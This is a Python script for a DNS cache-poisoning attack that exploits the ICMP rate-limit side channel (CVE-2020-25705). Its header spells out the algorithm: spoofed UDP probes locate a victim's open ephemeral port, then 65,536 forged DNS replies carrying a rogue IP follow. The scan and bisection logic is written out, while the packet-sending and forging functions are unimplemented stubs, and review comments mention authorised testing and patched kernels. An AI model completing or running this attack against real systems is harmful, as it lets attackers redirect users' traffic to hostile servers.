#!/usr/bin/python2
#
# Algorithm
#
#
# Prep-Work
#
# * Make a list of candidate ports (not all 65,535: only the victim's ephemeral range, 32768-60999 on a default Linux install)
# * Find 50 Known-Closed UDP Ports on the Victim
# * Victim = Ubuntu Server
# * DNS Resolver = Our internal DNS Resolver
#
# 1. Enter loop - Ask for 50 Port Numbers from the List
# 2. Use Scapy to send UDP Packets to all 50 ports to the Victim Spoofing the DNS Resolver IP
# 3. Use Scapy to send UDP Packet to one of the Known-Closed UDP Ports with my Real Source IP
# 4. Keep looping, asking for 50 more, until I get an ICMP message back (a reply to my real-source probe means the spoofed batch did not use up the victim's global ICMP rate limit, i.e. at least one of the 50 ports was open and produced no port-unreachable)
# 5. Exit that loop - Enter new loop - Swap out 25 of the 50 Port Numbers with the Known-Closed UDP Ports
# 6. Use Scapy to send UDP Packets to all 50 ports to the Victim Spoofing the DNS Resolver IP
# 7. Use Scapy to send UDP Packet to one of the Known-Closed UDP Ports with my Real Source IP
# 8. If I get an ICMP message back then I know the Open Port is in the 25 Port's I didn't change
# 9. Swap out 12 of those 25 with 12 more with the Known-Closed UDP Ports
# 10. If I get an ICMP message back, then I know the Open Port is in the 13 ports left
# 11. ..... Keep looping until I find the exact port .....
# 12. Send 65,536 DNS Reply packets for `www.example.com` (one per possible DNS transaction ID, 0-65535), spoofed from the resolver, carrying a Rogue IP Address instead of the real one, to the Victim IP and the Open UDP Port.
#
import random
import scapy
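HIGH_EPHEM_PORT_RANGE_NUMBER = 60999
LOW_EPHEM_PORT_RANGE_NUMBER = 32768
# The Linux default net.ipv4.ip_local_port_range ("32768 60999") is inclusive
# on both ends, so the upper bound must be part of the candidate list;
# range() stops one short of it. (The original also lacked a closing paren.)
EPHEM_PORTS = list(range(LOW_EPHEM_PORT_RANGE_NUMBER, HIGH_EPHEM_PORT_RANGE_NUMBER + 1))
# UDP ports verified closed on the victim. Fill in before running: the probe
# batches are padded with these so every probe has the same packet count.
CLOSED_PORTS = []
VICTIM_IP = ""      # target host; only test hosts you are authorised to test
RESOLVER_IP = ""    # the victim's upstream resolver; used as the spoofed source
TARGET_NAME = ""    # name to poison, e.g. "www.example.com"
POSION_IP = ""      # address to inject (name kept as-is, it is referenced elsewhere)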
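def doCheck(closed_port=1, ephem_ports=None):
    """Probe one batch of candidate ephemeral ports against the ICMP oracle.

    Intended behaviour, per the algorithm in the file header (the packet
    send/receive itself is not written yet):
      1. send one UDP datagram to each port in *ephem_ports* on VICTIM_IP,
         with the source address spoofed to RESOLVER_IP;
      2. send one UDP datagram to *closed_port* on VICTIM_IP from our real
         address and wait for an ICMP port-unreachable;
      3. return True if that ICMP reply arrives, False otherwise.

    Args:
        closed_port: UDP port on the victim known to be closed (default 1).
        ephem_ports: non-empty list of candidate UDP ports for the spoofed
            batch. (The original declared this as a non-default parameter
            after a defaulted one, which is a syntax error.)

    Returns:
        bool: True when the ICMP reply is observed.

    Raises:
        ValueError: if ephem_ports is empty/None or any port is out of range.
        NotImplementedError: the send/receive step has not been written.
    """
    if not ephem_ports:
        raise ValueError("ephem_ports must be a non-empty list of UDP ports")
    for port in list(ephem_ports) + [closed_port]:
        if not 0 < port <= 65535:
            raise ValueError("invalid UDP port: %r" % (port,))
    # NOTE(review): the real implementation needs raw sockets (root /
    # CAP_NET_RAW) and a network path that does not drop spoofed source
    # addresses (BCP 38); a stub returning False here would make the caller's
    # `while not result` loop spin forever, so fail loudly instead.
    raise NotImplementedError("doCheck: scapy send/receive not implemented")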
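def doPosion(ephem_port):
    """Flood the victim's open ephemeral port with forged DNS replies.

    Intended behaviour, per the file header (the forging/sending itself is
    not written yet): send a DNS answer for TARGET_NAME carrying POSION_IP,
    spoofed from RESOLVER_IP, to VICTIM_IP:ephem_port once for each of the
    65,536 possible DNS transaction IDs (0-65535), so that one of them
    matches the victim's outstanding query.

    Args:
        ephem_port: the victim's open UDP ephemeral port found by doCheck().

    Returns:
        bool: True if the poisoning succeeded.

    Raises:
        ValueError: if ephem_port is not a valid UDP port.
        NotImplementedError: the forge/send step has not been written.
    """
    if not 0 < ephem_port <= 65535:
        raise ValueError("invalid UDP port: %r" % (ephem_port,))
    # NOTE(review): same raw-socket / spoofing preconditions as doCheck().
    raise NotImplementedError("doPosion: forged DNS reply flood not implemented")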
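def _find_candidate_window(closed_port, batch_size):
    """Scan EPHEM_PORTS in fixed-size batches until one trips the oracle.

    Returns the list of ports in the first batch for which doCheck() reports
    an ICMP reply, or None once the whole range is exhausted. (The original
    loop never terminated in that case: it kept probing empty slices, and it
    passed the wrong, always-empty, list to doCheck().)
    """
    for start in range(0, len(EPHEM_PORTS), batch_size):
        window = EPHEM_PORTS[start:start + batch_size]
        if doCheck(closed_port=closed_port, ephem_ports=window):
            return window
    return None


def _bisect_open_port(candidates, closed_port, batch_size):
    """Narrow *candidates* down to the single open port, halving each round.

    Every probe is kept at *batch_size* packets by padding the half under
    test with ports from CLOSED_PORTS, so the oracle (which depends on how
    many ICMP replies the victim has to generate) sees the same load as it
    did during the scan. Both halves are tested before giving up: if neither
    trips the oracle the earlier hit was a false positive or the port has
    since been closed, and None is returned.
    """
    while len(candidates) > 1:
        mid = len(candidates) // 2
        for half in (candidates[:mid], candidates[mid:]):
            padding = CLOSED_PORTS[:batch_size - len(half)]
            if doCheck(closed_port=closed_port, ephem_ports=half + padding):
                candidates = half
                break
        else:
            return None
    return candidates[0] if candidates else None


def main():
    """Locate the victim's open UDP ephemeral port, then attempt the poisoning.

    Phase 1 scans EPHEM_PORTS in batches of 50 using doCheck() as the
    ICMP-rate-limit oracle (CVE-2020-25705); phase 2 bisects the batch that
    tripped it down to one port; phase 3 hands that port to doPosion().

    Preconditions, checked up front rather than failing deep inside a loop:
      * VICTIM_IP, RESOLVER_IP, TARGET_NAME and POSION_IP are filled in;
      * CLOSED_PORTS holds at least 50 ports verified closed on the victim,
        used as padding so every probe batch has the same packet count.

    Security / operational notes:
      * sending spoofed UDP needs raw sockets (root / CAP_NET_RAW) and a
        network path that does not drop spoofed sources (BCP 38);
      * kernels carrying the fix for CVE-2020-25705 randomise the global ICMP
        rate limit, so the oracle is expected to return noise, not a signal;
      * only run this against hosts you are authorised to test.

    NOTE(review): nothing in this file calls main(); add an
    `if __name__ == "__main__": main()` guard at the bottom before running.
    """
    batch_size = 50
    # Port queried from our real address after each spoofed batch; it is
    # assumed closed on the victim.
    # TODO(review): confirm 1/udp really is closed, or use CLOSED_PORTS[0].
    closed_port = 1

    if not (VICTIM_IP and RESOLVER_IP and TARGET_NAME and POSION_IP):
        raise SystemExit("Fill in VICTIM_IP, RESOLVER_IP, TARGET_NAME and POSION_IP first")
    if len(CLOSED_PORTS) < batch_size:
        raise SystemExit("CLOSED_PORTS needs at least %d known-closed ports" % batch_size)

    window = _find_candidate_window(closed_port, batch_size)
    if window is None:
        print("No batch tripped the oracle; no open ephemeral port found")
        return

    ephem_port = _bisect_open_port(window, closed_port, batch_size)
    if ephem_port is None:
        print("Lost the port while narrowing down (false positive or already closed)")
        return

    if doPosion(ephem_port):
        print("Pwn All The Things!")
    else:
        print("I should loop this program to just keep going instead of quitting here")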